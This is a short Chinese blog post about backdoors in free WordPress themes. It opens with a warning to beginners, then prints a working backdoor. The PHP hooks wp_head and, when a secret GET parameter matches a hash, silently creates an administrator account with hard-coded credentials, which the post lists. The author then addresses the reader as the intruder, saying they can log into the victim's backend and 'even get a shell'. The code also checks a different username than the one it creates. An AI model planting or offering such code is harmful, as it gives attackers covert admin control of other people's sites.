当前位置:首页>WP建站>Wordpress>关于WordPress主题的后门代码

关于WordPress主题的后门代码

前言

有一些刚刚接触WordPress的新手们,总是喜欢到网上去找一些免费主题,却不知道这些主题很有可能藏有后门,可以轻松的获取你的网站权限,从而获取非法利益,所以我在这里要提醒一下那些新手们,找主题一定要找正版的,如果是免费版,最好是在github有开源项目的主题,这样在一定程度上都会减少遇到后门的几率

示例

下面给大家带来一个常见的后门代码

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == 'b0f455571f6ae6c30e7521e9bf00b4f2' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'xinyewl', 'me' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

只要php触发了这段代码,进行了请求,你就可以使用你的密码来登陆他的后台了,正常登陆即可获得管理员权限,也就是说,你甚至可以拿到shell,具体不多说,自己领悟。

我这里默认设置的账号密码是

账号:xinyewl 
密码:me

补充,通过判断某一个值是否存在,进而进行数据库的账户密码执行操作,同时赋予执行账户的超级管理员权限,进而可以通过后台登录。

给TA打赏
共{{data.count}}人
人已打赏

相关文章

Wordpress

历史版本记录插件--演示页面

2023-1-11 17:21:18

Wordpress

B2-Pro主题Water-Rates评分插件演示页面

2023-2-15 13:29:55

{{yiyan[0].hitokoto}}
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索